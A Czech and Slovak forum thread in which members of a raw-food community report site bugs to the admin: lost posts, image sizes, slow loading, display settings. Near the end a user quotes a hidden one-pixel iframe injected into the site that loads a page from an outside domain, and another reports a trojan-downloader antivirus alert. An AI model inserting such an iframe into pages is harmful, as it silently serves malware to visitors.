Kniha závad
Moderátor: hugo
- hugo
- Site Admin
- Kontaktovat uživatele:
Kniha závad
Sem můžete psát všechny možné chyby (faktické, typografické, pravopisné, ...), které jste našli v diskuzi nebo v článcích na serveru.
Pokud to bude možné, tak se je budu snažit co nejrychleji opravit.
Pokud to bude možné, tak se je budu snažit co nejrychleji opravit.
„Zemi nedědíme po předcích, nýbrž si ji jen vypůjčujeme od našich dětí.“
Antoine de Saint-Exupéry
Kontakt: admin@vitrawian.eu
Antoine de Saint-Exupéry
- hugo
- Site Admin
- Kontaktovat uživatele:
Díkytvx píše:jablicko is history...
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Re: Kniha závad
Nefunguje mi prijimani SZ z fora na Jabber. Je to chyba systemu, nebo delam neco blbe? Hlasi mi to ze zprava byla odeslana...
Vyhrazuji si svate pravo na omyly!
- hugo
- Site Admin
- Kontaktovat uživatele:
Fungovat by to měla, možná se ta zpráva jen někde sekla po cestě. Zkusím se na to během týdne podívat.
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Dik, asi to mam v spatnem formatu, jeste budu sondovat, jsem takovy IT truhlik 

Vyhrazuji si svate pravo na omyly!
- RAWka
- Kontaktovat uživatele:
Do môjho denníku som dala obrázok, lenže je strašne velký a neviem ho zmenšiť. Dalo by sa s tým niečo spraviť? Veľmi pekne ďakujem:)
Hladať znamená mať ciel, ísť za ním a nevšímať si nič iné, byť ním posadnutý. Ale nehladať a nájsť znamená byť slobodný.
Prosbička pro Huga:
V pátek nový uživatel jménem Weronika, založil dvakrát téma Irisdiagnostika. Prosím, o přenesení fotky a komentáře do původně vytvořeného tématu mnou ( stejný název ), jde-li to. Jinak prosím smazat tyto témata od Weroniky, aby to téma tu bylo jednou a ne několikrát.
Weronika byla zde na servru v sobotu v půlnoci, tak předpokládám, že si komentář už přečetla...
Děkuji za ochotu a přeji hezký den. Awa
V pátek nový uživatel jménem Weronika, založil dvakrát téma Irisdiagnostika. Prosím, o přenesení fotky a komentáře do původně vytvořeného tématu mnou ( stejný název ), jde-li to. Jinak prosím smazat tyto témata od Weroniky, aby to téma tu bylo jednou a ne několikrát.
Weronika byla zde na servru v sobotu v půlnoci, tak předpokládám, že si komentář už přečetla...
- hugo
- Site Admin
- Kontaktovat uživatele:
Dal jsem tam menší verzi fotky.RAWka píše:Do môjho denníku som dala obrázok, lenže je strašne velký a neviem ho zmenšiť. Dalo by sa s tým niečo spraviť? Veľmi pekne ďakujem:)
Sloučil jsem témata.Awa píše:Prosbička pro Huga:
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Před chvílí jsem napsala příspěvek a bylo 19:00. Ale můj příspěvek je tam s časem 19:58. Prosím o opravu času dle aktuálního...Děkuji.
- hugo
- Site Admin
- Kontaktovat uživatele:
Čas se zobrazuje tak, jak ho máš nastavený v uživatelském panelu.
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Joj, to se cítím jako blbec...ale děkuji.
- RAWka
- Kontaktovat uživatele:
Ďakujem veľmi pekne:)
Hladať znamená mať ciel, ísť za ním a nevšímať si nič iné, byť ním posadnutý. Ale nehladať a nájsť znamená byť slobodný.
Vkladané obrázky, ktoré sú na výšku sa dajú vložiť menšie ako tie na šírku. Môžem vložiť 700 px široký ale len 500 px vysoký obrázok. To je diskriminácia formátu 

diskriminacia formatu 

- hugo
- Site Admin
- Kontaktovat uživatele:
OK, tak už můžeš vkládat i větší obrázekhugis píše:Vkladané obrázky, ktoré sú na výšku sa dajú vložiť menšie ako tie na šírku. Môžem vložiť 700 px široký ale len 500 px vysoký obrázok. To je diskriminácia formátu

Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
- Hugo z Hor
Nevím jestli je to jen můj problém, ale fórum vitariána se mě posledních pár dní strašně pomalu načítá (že by už byla databáze příspěvků tak obsáhlá?
)

Já nevěřím, že Bůh neexistuje. Já vím jistě, že neexistuje. A díkybohu, že neexistuje ... [OSHO]
- hugo
- Site Admin
- Kontaktovat uživatele:
JJ, nějak se to zpomalilo. Databáze je poměrně velká (přes 200 MB), ale viděl bych to spíš na problémy na serveru. Protože třeba brzo ráno to jede dobře.
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Mně připadá zpomalení databáze vcelku zanedbatelné (ikdyž znatelné to je, ale je to zcela v poho), ale jako skutečný problém vidím to, že občas padá connection během ukládání nového příspěvku. To se dříve nestávalo. Jestli Ti tato informace pomůže, Hugo...
Dokud jíš jen na hlad, je to v pohodě. Nepodléhej chutím!
od 12. 2. 2014 testuji nízkosacharid
- Katarína
- Kontaktovat uživatele:
Stavalo aj stava. Pred odoslanim dlhsieho prispevku si ho preventivne cely vyznac, stlac CTRL+C a je to. 

Čím väčšia spotreba mlieka a vajec, tým viac zvierat odsúdených na smrť pod nožom. A zvyčajne aj na utrpenie počas života.
- hugo
- Site Admin
- Kontaktovat uživatele:
To jsem taky zpozoroval, ale obávám se, že není v mých silách toto vyřešit.
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
No je fakt, Hugo, že to řeším tak, jak radí Katarína (chytrá holka, jo jo), takže to za vážnej problement nepovažuju. Spíš aby nenadávali ti ostatní, co clipboard neznajíKatarína píše:Stavalo aj stava. Pred odoslanim dlhsieho prispevku si ho preventivne cely vyznac, stlac CTRL+C a je to.

Dokud jíš jen na hlad, je to v pohodě. Nepodléhej chutím!
- Katarína
- Kontaktovat uživatele:
Len by som Ti prisla "opravit" pocitac, hned by si videl tu "chytrost".Jindra píše:jak radí Katarína (chytrá holka, jo jo)

Čím väčšia spotreba mlieka a vajec, tým viac zvierat odsúdených na smrť pod nožom. A zvyčajne aj na utrpenie počas života.
- hugo
- Site Admin
- Kontaktovat uživatele:
Nadávat můžou, ale to jim nepomůžeJindra píše:[No je fakt, Hugo, že to řeším tak, jak radí Katarína (chytrá holka, jo jo), takže to za vážnej problement nepovažuju. Spíš aby nenadávali ti ostatní, co clipboard neznají

Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
- Hugo z Hor
Tak mě se příspěvek ještě při odesílání nevymazal, asi to bude strohostí mého projevu. 
Chtěl jsem se jen ujistit, že to není jen můj problém.

Chtěl jsem se jen ujistit, že to není jen můj problém.
Já nevěřím, že Bůh neexistuje. Já vím jistě, že neexistuje. A díkybohu, že neexistuje ... [OSHO]
Prosim! Co mam delat, uz se mi kolikrat ztratil prispevek, ktery jsem odeslala a chvili na foru byl. Pak jsem po case napsala dalsi a ten predchozi zmizel.... Napsala jsem Kvete pomerne dlouhy prispevek a opet je fuc. Tentokrat me to dost nastvalo, protoze na tomhle prispevku pro Kvetu mi opravdu zalezelo! Neda se ten prispevek nejak dohledat zpet? Preci nekde musi byt, kdyz tam byl! Uz se mi to kolikrat stalo a i kdyz jsem jsem na to parkrat upozornila, nikdo se k tomu nikdy ani nevyjadril. Hugo, nevis nahodou, o co jde?? Co s tim? Diky!
Má pravdu. Já ten ztracený příspěvek četl a fakt už tam není.uz se mi kolikrat ztratil prispevek, ktery jsem odeslala a chvili na foru byl. Pak jsem po case napsala dalsi a ten predchozi zmizel....
- hugo
- Site Admin
- Kontaktovat uživatele:
Jediné co mě napadá, je že jsi ten příspěvek přepsala. Tzn. že jsi klikla na upravit.RadkaS píše:Prosim! Co mam delat, uz se mi kolikrat ztratil prispevek, ktery jsem odeslala a chvili na foru byl. Pak jsem po case napsala dalsi a ten predchozi zmizel.... Napsala jsem Kvete pomerne dlouhy prispevek a opet je fuc. Tentokrat me to dost nastvalo, protoze na tomhle prispevku pro Kvetu mi opravdu zalezelo! Neda se ten prispevek nejak dohledat zpet? Preci nekde musi byt, kdyz tam byl! Uz se mi to kolikrat stalo a i kdyz jsem jsem na to parkrat upozornila, nikdo se k tomu nikdy ani nevyjadril. Hugo, nevis nahodou, o co jde?? Co s tim? Diky!
Díval jsem se do logu a v poslední době nikdo žádný příspěvek nemazal.
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Tím to nebude, to by tam byla taková ta poznámka "naposledy upraveno"...
- hugo
- Site Admin
- Kontaktovat uživatele:
Taky pravda, ale příčinu asi nenajdu. Prošel jsem všechny logy a nikde nic není. Nejlepší obrana je psát dlouhé příspěvky třeba v notepadu a někam si to ukládat.dvdmchl píše:Tím to nebude, to by tam byla taková ta poznámka "naposledy upraveno"...
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Ta poznámka se objeví jen když někdo po ní přidal příspěvek - jestli to stihla ještě před dalším příspěvkem tak tam ta poznámka nebude.dvdmchl píše:Tím to nebude, to by tam byla taková ta poznámka "naposledy upraveno"...
tak takPanda píše:Ta poznámka se objeví jen když někdo po ní přidal příspěvek - jestli to stihla ještě před dalším příspěvkem tak tam ta poznámka nebude.dvdmchl píše:Tím to nebude, to by tam byla taková ta poznámka "naposledy upraveno"...
No, je to hnus. Prispevek tam byl, pak jsem byla jinde, pak jsem nakoukla zpatky, ze napisu, ze jsem precetla Kvety blok, myslim, ze mezitim tam nekdo stihl neco napsat a pak jsem teprve psala ja. Normalne, dalsi prispevek... Kazdopadne diky za zajem
jo technika. neni nad papir a tuzku. priste kopirovat a zalohovat.. 

'senbja' se nam mnozi 

- hugo
- Site Admin
- Kontaktovat uživatele:
Už neSweetie píše:'senbja' se nam mnozi

Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
- hugo
- Site Admin
- Kontaktovat uživatele:
Díval jsem se i přímo do db a pokud se nejedná o nějaký bud u phpBB, což si nemyslím (nikde jsem nic podobného nenašel), tak je jediná možnost, že sis to přepsala sama. Bohužel nemám čas se tomu nějak víc věnovat.RadkaS píše:No, je to hnus. Prispevek tam byl, pak jsem byla jinde, pak jsem nakoukla zpatky, ze napisu, ze jsem precetla Kvety blok, myslim, ze mezitim tam nekdo stihl neco napsat a pak jsem teprve psala ja. Normalne, dalsi prispevek... Kazdopadne diky za zajem
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Zničeho nic se mi začalo fórum zobrazovat takhle:
http://img27.imageshack.us/img27/5675/obrw.jpg
Všechna písmenka jsou obrovská a příspěvky jsou přes celou šířku obrazovky. Před pár hodinami to ještě fungovalo. Ostatní weby jednou normálně. Co s tím?
http://img27.imageshack.us/img27/5675/obrw.jpg
Všechna písmenka jsou obrovská a příspěvky jsou přes celou šířku obrazovky. Před pár hodinami to ještě fungovalo. Ostatní weby jednou normálně. Co s tím?
Krása a vitalita jsou dary přírody pro toho, kdo se řídí jejími zákony. (da Vinci)
Nevím jestli to bylo i předtím ale ve zdroji stránky přibylo:
Možná nějakej hack, kterej zároveň rozhodil styl.
Kód: Vybrat vše
<iframe src="http://mixante.cn/in.cgi?income53" width=1 height=1 style="visibility: hidden"></iframe>
- Hugo z Hor
Vidím to úplně stejně s tím, že na mě antivir vybafl při načítání stránky vitariána virový poplach - soubor D:\ODPAD\TEMP\E4B9.tmp Win32/TrojanDownloader.Agent.OWB trojský kùò uložen do karantény - smazán IQ152_2\Administrator Tato skuteènost byla zjištìna na novì vytvoøeném souboru aplikací: C:\WINDOWS\Explorer.EXE.
Na mě taky antivir s něčím vytasil, ale nevyznám se v tom a nenapadlo mě přičítat to vitariánovi.
Krása a vitalita jsou dary přírody pro toho, kdo se řídí jejími zákony. (da Vinci)
- Hugo z Hor
Holt to moje nachlazení je asi moc nakažlivý, že se přenáší i elektronickou cestou

- Hugo z Hor
Dyť to tak mám a stejně prd platný

- Hugo z Hor
Jinak, on je rozhozený i ten druhý styl, co si můžeme navolit

Co je špatného na Opeře? Já dřív používala firefox, ale jak jsem objevila operu, už jsem se nehla. 

- hugo
- Site Admin
- Kontaktovat uživatele:
Chyba na serveru, někomu se podařilo změnit pár souborů. Je to napraveno, snad se to nebude opakovat.
Antoine de Saint-Exupéry
Antoine de Saint-Exupéry
Díky moc, hugo! Jsi vždycky po ruce a rychle vše napravíš, ještěže tě máme
Ještě jednou děkuju.